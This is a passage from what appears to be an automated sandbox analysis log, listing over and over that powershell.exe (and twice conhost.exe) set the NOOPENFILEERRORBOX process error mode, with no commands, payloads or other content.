Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
